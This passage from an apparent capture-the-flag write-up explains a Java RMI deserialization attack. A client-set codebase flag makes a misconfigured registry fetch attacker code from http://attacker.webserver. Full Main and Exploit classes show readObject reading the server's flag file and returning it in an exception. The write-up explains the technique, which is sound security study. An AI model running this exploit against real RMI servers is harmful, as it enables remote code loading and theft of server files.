<p>But it’s not that easy, as the code for the Java object we want to deserialize (including the <code>readObject</code> method) must be already available to the server. There are some well known exploits that rely on java deserialization, and on the misuse of the <code>readObject</code> method of certain libraries already in the server’s classpath (see <a href="https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles">here</a>, <a href="https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">here</a>  and <a href="https://www.integrigy.com/files/Integrigy%20Oracle%20Java%20Deserialization%20Vulnerabilities.pdf">here</a> for instance), but we won’t need to make use of that.</p>
<p>Searching for the Oracle documentation we can find a feature that allows a RmiRegistry to dynamically load new classes if a server cannot resolve a class he can ask a web server its implementation, exactly what we needed!</p>
<p>If the RmiRegistry security policies are not configured correctly (ie. they allow all, and the <code>java.rmi.server.useCodebaseOnly</code> property is set to false) it is the <strong>client</strong> who can specify an http codebase for the server to use, by means of the <code>java.rmi.server.codebase</code> flag.</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>-Djava.rmi.server.codebase=http://attacker.webserver/folder</span></span>
<span class="line"><span></span></span></code></pre>
<p>Now that the server has a way to access the compiled binary of our exploit class, and its <code>readObject</code> method, the only thing we need to do to cause RMI to deserialize our exploit is just attempting to bind our exploit class as a new service on the RMI registry.</p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#BD976A">register</span><span style="color:#666666">.</span><span style="color:#80A665">bind</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">New service</span><span style="color:#C98A7D77">"</span><span style="color:#666666">,</span><span style="color:#DBD7CAEE"> exploit_class</span><span style="color:#666666">);</span></span>
<span class="line"></span></code></pre>
<p>Note that the binding of new services from the client is not allowed but the object will be de-serialised <strong>before</strong> that check is made by the system!</p>
<h3 id="the-exploit">The exploit</h3>
<p><em>Console command</em></p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>java -Djava.rmi.server.codebase=http://attacker.webserver/folder Main</span></span>
<span class="line"><span></span></span></code></pre>
<p><em>Main class</em></p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#CB7676">public</span><span style="color:#CB7676"> static</span><span style="color:#CB7676"> void</span><span style="color:#80A665"> main</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">String args</span><span style="color:#666666">[])</span><span style="color:#666666"> {</span></span>
<span class="line"></span>
<span class="line"><span style="color:#DBD7CAEE">  AverageService</span><span style="color:#BD976A"> service</span><span style="color:#666666"> =</span><span style="color:#4D9375"> null</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#DBD7CAEE">  Registry</span><span style="color:#BD976A"> reg1</span><span style="color:#666666"> =</span><span style="color:#4D9375"> null</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#DBD7CAEE">  Remote</span><span style="color:#BD976A"> p</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> Payload</span><span style="color:#666666">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#DBD7CAEE">  String</span><span style="color:#BD976A"> host</span><span style="color:#666666"> =</span><span style="color:#DBD7CAEE"> args</span><span style="color:#666666">[</span><span style="color:#4C9A91">0</span><span style="color:#666666">];</span></span>
<span class="line"><span style="color:#CB7676">  int</span><span style="color:#BD976A"> port</span><span style="color:#666666"> =</span><span style="color:#BD976A"> Integer</span><span style="color:#666666">.</span><span style="color:#80A665">parseInt</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">args</span><span style="color:#666666">[</span><span style="color:#4C9A91">1</span><span style="color:#666666">]);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#BD976A">  System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">Searching registry at </span><span style="color:#C98A7D77">"</span><span style="color:#CB7676">+</span><span style="color:#DBD7CAEE">host</span><span style="color:#CB7676">+</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">:</span><span style="color:#C98A7D77">"</span><span style="color:#CB7676">+</span><span style="color:#DBD7CAEE">port</span><span style="color:#666666">);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#4D9375">  try</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#DBD7CAEE">      reg1 </span><span style="color:#666666">=</span><span style="color:#BD976A"> LocateRegistry</span><span style="color:#666666">.</span><span style="color:#80A665">getRegistry</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">host</span><span style="color:#666666">,</span><span style="color:#DBD7CAEE">port</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">  }</span><span style="color:#4D9375"> catch</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">RemoteException </span><span style="color:#BD976A">e</span><span style="color:#666666">)</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">      System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">No registry   found!</span><span style="color:#C99076">\n</span><span style="color:#C98A7D">Aborting...</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">      e</span><span style="color:#666666">.</span><span style="color:#80A665">printStackTrace</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#4D9375">      return</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#666666">  }</span><span style="color:#4D9375"> finally</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">      System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">Registry found!</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">  }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#BD976A">  System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">Starting exploit...</span><span style="color:#C98A7D77">"</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#4D9375">  try</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">      reg1</span><span style="color:#666666">.</span><span style="color:#80A665">bind</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">new service</span><span style="color:#C98A7D77">"</span><span style="color:#666666">,</span><span style="color:#DBD7CAEE"> p</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#666666">  }</span><span style="color:#4D9375"> catch</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">RemoteException </span><span style="color:#666666">|</span><span style="color:#DBD7CAEE"> AlreadyBoundException </span><span style="color:#BD976A">e</span><span style="color:#666666">)</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">      System</span><span style="color:#666666">.</span><span style="color:#BD976A">out</span><span style="color:#666666">.</span><span style="color:#80A665">println</span><span style="color:#666666">(</span><span style="color:#BD976A">e</span><span style="color:#666666">.</span><span style="color:#80A665">getMessage</span><span style="color:#666666">());</span></span>
<span class="line"><span style="color:#666666">  }</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"></span></code></pre>
<p><em>Exploit class</em></p>
<pre class="astro-code vitesse-dark" style="background-color:#121212;color:#dbd7caee; overflow-x: auto;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#CB7676">public</span><span style="color:#CB7676"> class</span><span style="color:#5DA994"> Exploit</span><span style="color:#CB7676"> implements</span><span style="color:#80A665"> Remote</span><span style="color:#666666">,</span><span style="color:#80A665"> Serializable</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#CB7676">  public</span><span style="color:#CB7676"> void</span><span style="color:#80A665"> exploit</span><span style="color:#666666">()</span><span style="color:#CB7676"> throws</span><span style="color:#DBD7CAEE"> IOException </span><span style="color:#666666">{</span></span>
<span class="line"><span style="color:#758575DD">      /*</span></span>
<span class="line"><span style="color:#758575DD">       Cat flag is not java enough</span></span>
<span class="line"><span style="color:#758575DD">      */</span></span>
<span class="line"><span style="color:#DBD7CAEE">      BufferedReader</span><span style="color:#BD976A"> br</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> BufferedReader</span><span style="color:#666666">(</span><span style="color:#4D9375">new</span><span style="color:#80A665"> FileReader</span><span style="color:#666666">(</span><span style="color:#C98A7D77">"</span><span style="color:#C98A7D">flag</span><span style="color:#C98A7D77">"</span><span style="color:#666666">));</span></span>
<span class="line"><span style="color:#4D9375">      try</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#DBD7CAEE">          StringBuilder</span><span style="color:#BD976A"> sb</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span><span style="color:#80A665"> StringBuilder</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#DBD7CAEE">          String</span><span style="color:#BD976A"> line</span><span style="color:#666666"> =</span><span style="color:#BD976A"> br</span><span style="color:#666666">.</span><span style="color:#80A665">readLine</span><span style="color:#666666">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#4D9375">          while</span><span style="color:#666666"> (</span><span style="color:#DBD7CAEE">line </span><span style="color:#CB7676">!=</span><span style="color:#4D9375"> null</span><span style="color:#666666">)</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">              sb</span><span style="color:#666666">.</span><span style="color:#80A665">append</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">line</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#BD976A">              sb</span><span style="color:#666666">.</span><span style="color:#80A665">append</span><span style="color:#666666">(</span><span style="color:#BD976A">System</span><span style="color:#666666">.</span><span style="color:#80A665">lineSeparator</span><span style="color:#666666">());</span></span>
<span class="line"><span style="color:#DBD7CAEE">              line </span><span style="color:#666666">=</span><span style="color:#BD976A"> br</span><span style="color:#666666">.</span><span style="color:#80A665">readLine</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#666666">          }</span></span>
<span class="line"><span style="color:#DBD7CAEE">          String</span><span style="color:#BD976A"> everything</span><span style="color:#666666"> =</span><span style="color:#BD976A"> sb</span><span style="color:#666666">.</span><span style="color:#80A665">toString</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#758575DD">          /*</span></span>
<span class="line"><span style="color:#758575DD">            We cannot use System.out to print the string</span></span>
<span class="line"><span style="color:#758575DD">            so I decided to insert the result of the exploit inside</span></span>
<span class="line"><span style="color:#758575DD">             an exception.</span></span>
<span class="line"><span style="color:#758575DD">            All the unhandled exceptions are kindly sent back to the client.</span></span>
<span class="line"><span style="color:#758575DD">          */</span></span>
<span class="line"><span style="color:#DBD7CAEE">          IOException</span><span style="color:#BD976A"> e</span><span style="color:#666666"> =</span><span style="color:#4D9375"> new</span></span>
<span class="line"><span style="color:#80A665">          IOException</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">everything</span><span style="color:#666666">);</span></span>
<span class="line"><span style="color:#4D9375">          throw</span><span style="color:#DBD7CAEE"> e</span><span style="color:#666666">;</span></span>
<span class="line"><span style="color:#666666">      }</span><span style="color:#4D9375"> finally</span><span style="color:#666666"> {</span></span>
<span class="line"><span style="color:#BD976A">          br</span><span style="color:#666666">.</span><span style="color:#80A665">close</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#666666">      }</span></span>
<span class="line"><span style="color:#666666">  }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#CB7676">  private</span><span style="color:#CB7676"> void</span><span style="color:#80A665"> readObject</span><span style="color:#666666">(</span><span style="color:#DBD7CAEE">java</span><span style="color:#666666">.</span><span style="color:#DBD7CAEE">io</span><span style="color:#666666">.</span><span style="color:#DBD7CAEE">ObjectInputStream </span><span style="color:#BD976A">in</span><span style="color:#666666">)</span><span style="color:#CB7676"> throws</span><span style="color:#DBD7CAEE"> IOException</span><span style="color:#666666">,</span><span style="color:#DBD7CAEE"> ClassNotFoundException </span><span style="color:#666666">{</span></span>
<span class="line"><span style="color:#80A665">      exploit</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#BD976A">      in</span><span style="color:#666666">.</span><span style="color:#80A665">defaultReadObject</span><span style="color:#666666">();</span></span>
<span class="line"><span style="color:#666666">  }</span></span>
<span class="line"><span style="color:#666666">}</span></span>
<span class="line"></span></code></pre>
<h3 id="references">References</h3>
<ul>
<li><a href="https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles">AppSecCali 2015 - Marshalling Pickles</a></li>
<li><a href="https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability</a></li>
<li><a href="https://www.integrigy.com/files/Integrigy%20Oracle%20Java%20Deserialization%20Vulnerabilities.pdf">Oracle Java Deserialization</a></li>
</ul>  </div> </article> </main> <footer data-astro-cid-sz7xmlte>
&copy; 2025 Tower of Hanoi. All rights reserved.
<div class="social-links" data-astro-cid-sz7xmlte> <a href="https://twitter.com/towerofhanoi" target="_blank" data-astro-cid-sz7xmlte> <span class="sr-only" data-astro-cid-sz7xmlte>Follow Tower of Hanoi on Twitter</span> <svg viewBox="0 0 16 16" aria-hidden="true" width="32" height="32" astro-icon="social/twitter" data-astro-cid-sz7xmlte><path fill="currentColor" d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z" data-astro-cid-sz7xmlte></path></svg> </a> <a href="https://github.com/towerofhanoi" target="_blank" data-astro-cid-sz7xmlte> <span class="sr-only" data-astro-cid-sz7xmlte>Go to Tower of Haoi's GitHub repo</span> <svg viewBox="0 0 16 16" aria-hidden="true" width="32" height="32" astro-icon="social/github" data-astro-cid-sz7xmlte><path fill="currentColor" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z" data-astro-cid-sz7xmlte></path></svg> </a> <a href="https://ctftime.org/team/300" target="_blank" data-astro-cid-sz7xmlte> <span class="sr-only" data-astro-cid-sz7xmlte>Go to Tower of Hanoi's CTF Time page</span> <svg viewBox="0 0 16 16" width="32" height="32" data-astro-cid-sz7xmlte> <path fill="currentColor" d="M 0,0 H 16 V 16 H 0 L 4.7205698,7.7838485 Z" data-astro-cid-sz7xmlte></path> </svg> </a> </div> </footer>  </body></html>